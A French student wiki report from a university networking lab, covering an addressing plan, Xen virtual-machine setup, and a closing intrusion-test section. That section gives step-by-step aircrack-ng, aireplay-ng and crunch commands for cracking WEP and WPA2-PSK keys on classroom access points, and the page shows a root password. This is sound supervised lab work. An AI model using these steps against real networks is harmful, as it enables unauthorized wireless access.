TP sysres IMA5 2021/2022 G9 : Différence entre versions

De Wiki d'activités IMA
(Page blanchie)
Ligne 1 : Ligne 1 :
Wiki compte-rendu de TP PRA - Alvaro et Khalil
 
  
= Sujet =
 
 
L'objectif de ce TP est de créer un réseau redondé
 
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/
 
 
= 1. Configuration du Réseau physique =
 
 
 
 
=Plan d'adressage=
 
 
{| class="wikitable"
 
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM
 
|-
 
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg
 
|-
 
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu
 
|-
 
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel
 
|-
 
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet
 
|-
 
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe ||  
 
|-
 
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose
 
|-
 
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke
 
|-
 
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol ||  
 
|-
 
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys ||  
 
|-
 
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit ||  
 
|-
 
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot ||  
 
|-
 
|}
 
 
Table du VLAN 42
 
{| class="wikitable"
 
! Groupe !! @IPv4 MV !! @IPv6 MV (auto)
 
|-
 
| Andrei / Julien || 193.48.57.176 ||  
 
|-
 
| Robin / Aviran || 193.48.57.177 ||  
 
|-
 
| Axel / Guillaume || 193.48.57.178 ||  
 
|-
 
| Selim / Raphael || 193.48.57.179 ||  
 
|-
 
| Helene / Camille || 193.48.57.180 ||  
 
|-
 
| Boris / Louis || 193.48.57.181 ||  
 
|-
 
| Johnny / Arthur || 193.48.57.182 ||  
 
|-
 
| Mel / Theo || 193.48.57.183 ||  
 
|-
 
| Khalil / Alvaro || 193.48.57.184 ||  
 
|-
 
| SOuleyman / Enoch || 193.48.57.185 ||  
 
|-
 
| Clement || 193.48.57.186 ||  
 
|-
 
|}
 
 
Note :
 
 
'''à compléter '''
 
{| class="wikitable"
 
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2
 
|-
 
| ROUTEUR E304
 
|
 
| 193.48.57.187
 
|
 
| :: :F0
 
| :: :F0
 
| 10.NN.00.250
 
|
 
|
 
|
 
|-
 
| ROUTEUR E306
 
|
 
| 193.48.57.188
 
|
 
| :: :F1
 
| :: :F1
 
| 10.NN.00.251
 
|
 
|
 
|
 
|-
 
| ROUTEUR SR52
 
|
 
| 193.48.57.189
 
|
 
| :: :F2
 
| :: :F2
 
| 10.NN.00.252
 
|
 
|
 
|
 
|-
 
| ROUTEUR FLOTTANTE
 
|
 
| 193.48.57.190
 
|
 
| :: :F3
 
| :: :F3
 
| 10.NN.00.253
 
|
 
|
 
|
 
|-
 
| Vlan INTERCO 531 INTERCO-SA
 
|
 
| 192.168.222.40/29
 
|
 
| fe80::/10    ::1
 
| fe80::/10    ::1
 
| 10.NN.00.253
 
|
 
|
 
|
 
|-
 
| Vlan INTERCO E304
 
|
 
| 192.168.222.42/29
 
|
 
| fe80::/10    ::1
 
| fe80::/10    ::1
 
|
 
|
 
|
 
|
 
|-
 
| Vlan INTERCO E306
 
|
 
| 192.168.222.43/29
 
|
 
| fe80::/10    ::2
 
| fe80::/10    ::2
 
|
 
|
 
|
 
|
 
|-
 
| Vlan INTERCO SR53
 
|
 
| 192.168.222.44/29
 
|
 
| fe80::/10    ::3
 
| fe80::/10    ::3
 
|
 
|
 
|
 
|
 
|}
 
 
 
 
* Plan d'adressage IPv4 :
 
{| class="plan_addr"
 
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2
 
|-
 
|
 
|}
 
 
* Plan d'adressage IPv6 :
 
{| class="plan_addr"
 
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2
 
|-
 
 
|}
 
 
= 3. Configuration des Machines Virtuelles =
 
 
On se connecte en ssh à capbreton :
 
ssh root@capbreton
 
 
Nous incluons le proxy de polytech dans nos variables d'environnement:
 
export http_proxy=http://proxy.plil.fr:3128
 
 
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).
 
xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye
 
 
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:
 
lvcreate -L10G -n Paixdieu1 storage
 
lvcreate -L10G -n Paixdieu2 storage
 
 
Puis nous les avons formatés au format ext4 de la manière suivante:
 
mkfs.ext4 /dev/storage/Paixdieu1
 
mkfs.ext4 /dev/storage/Paixdieu2
 
 
nous modifions ensuite notre fichier "/etc/xen/Paixdieu.cfg" pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.
 
Pour cela on ajoute les lignes suivantes:
 
#
 
#  Disk device(s).
 
#
 
root        = '/dev/xvda2 ro'
 
disk        = [
 
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',
 
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',
 
    ''''phy:/dev/storage/Paixdieu1,xvda3,w','''
 
    ''''phy:/dev/storage/Paixdieu2,xvda4,w''''
 
              ]
 
 
 
#
 
#  Physical volumes
 
#
 
 
 
#
 
#  Hostname
 
#
 
name        = 'Paixdieu'
 
 
#
 
#  Networking
 
#
 
vif        = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]
 
 
Nous lancons la machine virtuelle:
 
xl create -c /etc/xen/Paixdieu.cfg
 
 
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:
 
mkdir /mnt/xvda3
 
mkdir /mnt/xvda4
 
mount /dev/xvda3 /mnt/xvda3
 
mount /dev/xvda4 /mnt/xvda4
 
 
Nous y déplaçons le répertoire /var/ dans xvda4:
 
mv /var/* /mnt/xvda4
 
 
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:
 
proc            /proc          proc    defaults        0      0
 
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0
 
/dev/xvda1 none swap sw 0 0
 
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
 
'''/dev/xvda3 /home ext4 defaults 0 2'''
 
'''/dev/xvda4 /var ext4 defaults 0 2'''
 
 
Puis nous lancons la commande de montage:
 
mount -a
 
 
Nous obtenons les partitions suivantes:
 
'''lsblk'''
 
 
NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
 
xvda1 202:1    0  512M  0 disk [SWAP]
 
xvda2 202:2    0    4G  0 disk /
 
'''xvda3 202:3 0 10G 0 disk /home'''
 
'''xvda4 202:4 0 10G 0 disk /var'''
 
 
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:
 
# This file describes the network interfaces available on your system
 
# and how to activate them. For more information, see interfaces(5).
 
 
 
# The loopback network interface
 
auto lo
 
iface lo inet loopback
 
 
# The primary network interface
 
auto eth0
 
iface eth0 inet static
 
address 193.48.57.177
 
gateway 193.48.57.188
 
netmask 255.255.255.240
 
'''iface eth0 inet6 auto'''
 
 
# post-up  ethtool -K eth0 tx off
 
 
#
 
# The commented out line above will disable TCP checksumming which
 
# might resolve problems for some users.  It is disabled by default
 
 
Nous effectuons les commandes suivantes pour appliquer les changements:
 
systemctl restart networking
 
ip a
 
 
Et nous obtenons les résultats comme ça:
 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 
    inet 127.0.0.1/8 scope host lo
 
      valid_lft forever preferred_lft forever
 
    inet6 ::1/128 scope host
 
      valid_lft forever preferred_lft forever
 
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
 
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff
 
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0
 
      valid_lft forever preferred_lft forever
 
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr
 
      valid_lft 2591995sec preferred_lft 604795sec
 
    inet6 fe80::216:3eff:fe95:13ae/64 scope link
 
      valid_lft forever preferred_lft forever
 
 
Puis nous quittons la VM avec '''CTRL + ['''
 
 
Pour y retourner:
 
xen console Paixdieu
 
 
Pour retourner sur sa machine virtuelle, il faut :
 
 
- retourner sur capbreton
 
ssh root@capbreton
 
- Relancer la VM (login : root | password : glopglopglop):
 
xl create -c /etc/xen/Paixdieu.cfg
 
 
= 4. Architecture réseau =
 
 
== L'architecture générale ==
 
[[Fichier:Pra diagrams.png]]
 
 
== Les réseaux virtuels ==
 
 
== Le routage du site (IPv4) ==
 
 
 
== Le routage du site (IPv6) ==
 
[insérer résumé]
 
 
== Tests d'intrusion ==
 
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''
 
 
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.
 
 
Commandes réalisées sur un eeePC sous Linux :
 
 
Récupération du nom de l'interface réseau WiFi du eeePC:
 
 
ip a
 
 
On trouve : '''wlx40a5ef0f68cb'''
 
 
Mettre la carte réseau WiFi en mode monitor sur le channel 4:
 
 
airmon-ng start wlx40a5ef0f68cb 4
 
 
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.
 
 
Vérification que celle-ci est bien en mode monitor :
 
 
iwconfig
 
 
Ecouter les beacon WiFi sur cette carte réseau :
 
 
airodump-ng wlan0mon
 
 
 
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''
 
 
Nous simulons l'authentification sur cet AP :
 
 
aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon
 
 
-9 : mode injection
 
-e cracotte09 : nom du point d'accès
 
-a 04:DA:D2:9C:50:58 : bssid du point d'accès
 
 
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :
 
 
aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon
 
 
-1 : mode "fake authentification"
 
0 : délai entre les demandes d'authentifications
 
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau
 
 
Résultat :
 
 
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]
 
 
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''
 
 
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :
 
 
airmon-ng start wlx40a5ef0f68cb 4
 
 
airodump-ng wlan0mon
 
 
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :
 
 
airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon
 
 
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :
 
 
apt-get install crunch
 
 
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :
 
 
 
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]
 
 
 
Une fois installé nous pouvons générer le dictionnaire :
 
crunch 8 8 0123456789 -o password.lst
 
 
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :
 
 
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap
 
 
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]
 

Version du 29 novembre 2021 à 16:08